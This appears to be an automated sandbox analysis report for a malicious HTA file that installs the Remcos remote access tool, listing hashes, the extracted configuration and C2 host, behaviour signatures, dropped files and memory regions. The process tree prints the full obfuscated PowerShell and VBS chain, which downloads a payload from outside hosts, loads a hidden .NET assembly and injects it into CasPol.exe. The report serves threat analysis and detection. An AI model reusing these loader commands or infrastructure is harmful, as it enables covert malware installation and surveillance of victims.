Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-11-2024 08:24

General

  • Target

    sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta

  • Size

    599KB

  • MD5

    5a9dc05899d1a19be638824e5f47b88e

  • SHA1

    418e5c2cfc4ba40069bbcbc7373e9ff0b71740f2

  • SHA256

    741297ecc59d39296f360b100032cdb120af2eb4ccc5b91f370c0eacb9ee7e25

  • SHA512

    0772c9718b79ccff96ed8631ad22d117876c1cb5f1b9313494051e52a63b8f360d8f5fc81beaee296e120a873e99414818bb36db6bf795dfe99d54b3f47f4d7e

  • SSDEEP

    192:4dE6COljVneLyZXcFeLyZXcEeLyZXc/Czt4kQ:b6COljV+zO7

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c

exe.dropper

https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c

Extracted

Family

remcos

Botnet

RemoteHost

C2

nextnewupdationsforu.duckdns.org:14645

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-EC111K

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 31 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:3312
    • C:\Windows\SysWOW64\WInDowSpoWeRShell\V1.0\POwersheLL.exE
      "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1220
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4300
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u04zz4fr\u04zz4fr.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1812
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBD35.tmp" "c:\Users\Admin\AppData\Local\Temp\u04zz4fr\CSC377748FF1CF4740B43B7A31ABD35763.TMP"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:2656
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3640
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:404
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1480
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4500

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\POwersheLL.exE.log

    Filesize

    2KB

    MD5

    968cb9309758126772781b83adb8a28f

    SHA1

    8da30e71accf186b2ba11da1797cf67f8f78b47c

    SHA256

    92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

    SHA512

    4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    12KB

    MD5

    2e310b6f2840a9e00ff628e8b31a3e10

    SHA1

    7ea44180229dc1e61dd804438f5f533f0ee0b4b7

    SHA256

    3c5623d9cd84e5dba7920dcfa35a1fc224d3c3a5b334712151c89326b1188634

    SHA512

    beb84ef1959f5bb156febd85b2fdaa046ab830b260ca74be6d9ba64ea96d322194cde4e8eb5ba958805cbd933ba4e952bb927d5f9c2515670da2aa05fa346fad

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    4c9d88517a0bbe8c4063178de19b5913

    SHA1

    72be6cc9def9edaddfd22d38c9f582fe242ccea2

    SHA256

    9e4d753c962736f9ad7dd0b918e18fe504db1cafbeada835b820f400a2d47934

    SHA512

    a314397757ccd859e523241f44f495e5933d1089a46be4c8345fe8d485a8d88e6ccdd157f3adbe8fdb084da820ae52f290a7578a1360847c0e45e36e42e6ab0f

  • C:\Users\Admin\AppData\Local\Temp\RESBD35.tmp

    Filesize

    1KB

    MD5

    628d733bdeecd36da561f4d3cd82f09d

    SHA1

    2488b7676d6a24ec4a8b2e86ed5480830c8ee096

    SHA256

    3a527acb27c00c4d3a3fbe085acd23761fef605ec1a63521402bc1060088bf61

    SHA512

    dffbd545641ef8d7bad542156f593d049de1a02c24edd0b68ad423f72b5569831f9efc51661f8ff0173837cfdc044471d2cffc959d2a216b5fa439e0bfb4f889

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xdoocnyj.br4.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\u04zz4fr\u04zz4fr.dll

    Filesize

    3KB

    MD5

    8585e5fce417d71f2f41580badb0e706

    SHA1

    45f34f3092890f0f89aefda971044ad6d2c90496

    SHA256

    c755c755e750a41eca81824d63287aa695d67f48cca925bf27c60575eec5300e

    SHA512

    f77b7d082084014775769ed9264c401b9f6acc1095c29087714d40815260c39b5f0246a4c0d0566559d57d94d600b0d9bb6f3a41a9cdc9e651ce22e2bb6ce7c7

  • C:\Users\Admin\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs

    Filesize

    162KB

    MD5

    8ba4e1dcc487bd110b4bcd41e7ee2ba5

    SHA1

    1881afff1eb946fdb3ee62133ca43d0bc136ac37

    SHA256

    4bcb2f9b3a929bd940484218ef0a8c03842480a15bd8a3c4521f5097bd89d581

    SHA512

    006b7dcfdb7ee27ca1e6aa536c2399321966ffc3b82bc0f86470614345b6e0a2a1ed1d7a143c500669fba375f9706cff8ed421502df7f12f49c3260dc5a8bde4

  • \??\c:\Users\Admin\AppData\Local\Temp\u04zz4fr\CSC377748FF1CF4740B43B7A31ABD35763.TMP

    Filesize

    652B

    MD5

    ad1262617c6470d532c54f1076298dbf

    SHA1

    2b303405ac9d49d2829003e1d61515830e5a1b02

    SHA256

    cadc383966e89686d3442a369f88136697efa34939b7a2051e534c0013a276ba

    SHA512

    1f7cea62d7479a5394439ac373580e3dd7796e1b51aa034b0d21ec4a307b52dd54b1f46098a4381c105cb5548ca1ce6d3a4b1538c3681d939d4a07e9ac7e1f4d

  • \??\c:\Users\Admin\AppData\Local\Temp\u04zz4fr\u04zz4fr.0.cs

    Filesize

    488B

    MD5

    df59540f8edd52a40245b77825076b5c

    SHA1

    101a773a82eef36b277291d6e450d4984136b176

    SHA256

    041ed2f3f184dd53c0b2bacbe7e55a05a747a3ed1aa2cab0e8c93e9ab25a121f

    SHA512

    790e1139eab1d895386730743ea05b591820178b76fec615acab192ad8d2c5960703cebc2c6f4efc8158020506f35cb69ae6545c649e3d87b74845fbc2ec1990

  • \??\c:\Users\Admin\AppData\Local\Temp\u04zz4fr\u04zz4fr.cmdline

    Filesize

    369B

    MD5

    6b19ad13178744d3b9f2909193fbaaa9

    SHA1

    4aebc2e982eb1533973b848f47e02cde8d2b3266

    SHA256

    cb7650c9c8df97c137c408de57633a1a3ee4a507e41402c5047fa82b8aca7e77

    SHA512

    7cb7e156d61ef46daaa6cf87605bb040a3ba9d22bd6db3a30332b6bbb5c06690eaf99b01588813b3376c81fff5b0b8a5f14081acaae6866112aad79411c6523f

  • memory/404-86-0x0000000005E00000-0x0000000006154000-memory.dmp

    Filesize

    3.3MB

  • memory/1220-70-0x0000000070DEE000-0x0000000070DEF000-memory.dmp

    Filesize

    4KB

  • memory/1220-73-0x0000000008110000-0x00000000086B4000-memory.dmp

    Filesize

    5.6MB

  • memory/1220-0-0x0000000070DEE000-0x0000000070DEF000-memory.dmp

    Filesize

    4KB

  • memory/1220-1-0x0000000002580000-0x00000000025B6000-memory.dmp

    Filesize

    216KB

  • memory/1220-80-0x0000000070DE0000-0x0000000071590000-memory.dmp

    Filesize

    7.7MB

  • memory/1220-3-0x0000000004FF0000-0x0000000005618000-memory.dmp

    Filesize

    6.2MB

  • memory/1220-2-0x0000000070DE0000-0x0000000071590000-memory.dmp

    Filesize

    7.7MB

  • memory/1220-4-0x0000000005620000-0x0000000005642000-memory.dmp

    Filesize

    136KB

  • memory/1220-72-0x0000000007260000-0x0000000007282000-memory.dmp

    Filesize

    136KB

  • memory/1220-71-0x0000000070DE0000-0x0000000071590000-memory.dmp

    Filesize

    7.7MB

  • memory/1220-5-0x0000000005780000-0x00000000057E6000-memory.dmp

    Filesize

    408KB

  • memory/1220-64-0x0000000006460000-0x0000000006468000-memory.dmp

    Filesize

    32KB

  • memory/1220-6-0x0000000005860000-0x00000000058C6000-memory.dmp

    Filesize

    408KB

  • memory/1220-16-0x00000000059E0000-0x0000000005D34000-memory.dmp

    Filesize

    3.3MB

  • memory/1220-18-0x0000000005EE0000-0x0000000005F2C000-memory.dmp

    Filesize

    304KB

  • memory/1220-17-0x0000000005E80000-0x0000000005E9E000-memory.dmp

    Filesize

    120KB

  • memory/1480-102-0x0000000007160000-0x00000000072B8000-memory.dmp

    Filesize

    1.3MB

  • memory/1480-103-0x0000000007360000-0x00000000073FC000-memory.dmp

    Filesize

    624KB

  • memory/4300-29-0x000000006D6A0000-0x000000006D6EC000-memory.dmp

    Filesize

    304KB

  • memory/4300-47-0x0000000007690000-0x00000000076A4000-memory.dmp

    Filesize

    80KB

  • memory/4300-46-0x0000000007680000-0x000000000768E000-memory.dmp

    Filesize

    56KB

  • memory/4300-45-0x0000000007650000-0x0000000007661000-memory.dmp

    Filesize

    68KB

  • memory/4300-28-0x00000000070D0000-0x0000000007102000-memory.dmp

    Filesize

    200KB

  • memory/4300-44-0x00000000076D0000-0x0000000007766000-memory.dmp

    Filesize

    600KB

  • memory/4300-43-0x00000000074C0000-0x00000000074CA000-memory.dmp

    Filesize

    40KB

  • memory/4300-42-0x0000000007450000-0x000000000746A000-memory.dmp

    Filesize

    104KB

  • memory/4300-41-0x0000000007AA0000-0x000000000811A000-memory.dmp

    Filesize

    6.5MB

  • memory/4300-40-0x0000000007120000-0x00000000071C3000-memory.dmp

    Filesize

    652KB

  • memory/4300-48-0x0000000007790000-0x00000000077AA000-memory.dmp

    Filesize

    104KB

  • memory/4300-49-0x0000000007770000-0x0000000007778000-memory.dmp

    Filesize

    32KB

  • memory/4300-39-0x00000000070B0000-0x00000000070CE000-memory.dmp

    Filesize

    120KB

  • memory/4500-117-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-138-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-105-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-110-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-111-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-112-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-113-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-114-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-115-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-116-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-104-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-118-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-119-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-120-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-121-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-122-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-123-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-124-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-125-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-126-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-127-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-128-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-129-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-130-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-131-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-132-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-133-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-134-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-135-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-136-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-137-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-107-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-139-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-140-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-141-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-142-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-143-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-144-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-145-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-146-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-147-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-148-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-149-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-150-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-151-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-152-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-153-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-154-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-155-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-156-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-157-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-158-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-159-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-160-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-161-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-162-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-163-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-164-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-165-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-166-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-167-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/4500-168-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

